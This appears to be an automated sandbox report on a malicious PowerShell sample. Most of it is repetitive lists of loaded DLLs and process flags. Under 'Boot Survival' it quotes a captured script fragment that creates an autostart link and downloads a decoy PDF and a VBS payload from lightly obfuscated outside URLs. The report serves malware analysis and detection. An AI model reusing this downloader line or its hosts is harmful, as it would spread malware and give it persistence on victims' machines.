      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2322019431.0000028B0F862000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2205292098.0000015040265000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2422673623.0000028B29C02000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2322019431.0000028B0F862000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2422673623.0000028B29C52000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbe source: powershell.exe, 00000000.00000002.2422673623.0000028B29C02000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.2326344878.0000028B11370000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: CallSite.Target.pdbon.resources source: powershell.exe, 00000000.00000002.2424666019.0000028B29CEA000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000000.00000002.2422673623.0000028B29C52000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32X source: powershell.exe, 00000003.00000002.2204234398.00000150401C7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000000.00000002.2422673623.0000028B29C02000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000000.00000002.2422673623.0000028B29C52000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD34990D6C push eax; ret 3_2_00007FFD34990D6D

      Boot Survival

      barindex
      Powershell creates an autostart link
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'hthviwww.astpw4ntpw4rprispw4s.com.pk/ms/List%20of%20rpw4quirpw4d%20itpw4ms%20and%20spw4rvicpw4s.pdf';getit -fz $flol -oulv 'http://www.blupw4maxxlaspw4r.com/ms/ms.vbs';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell user required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help use

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
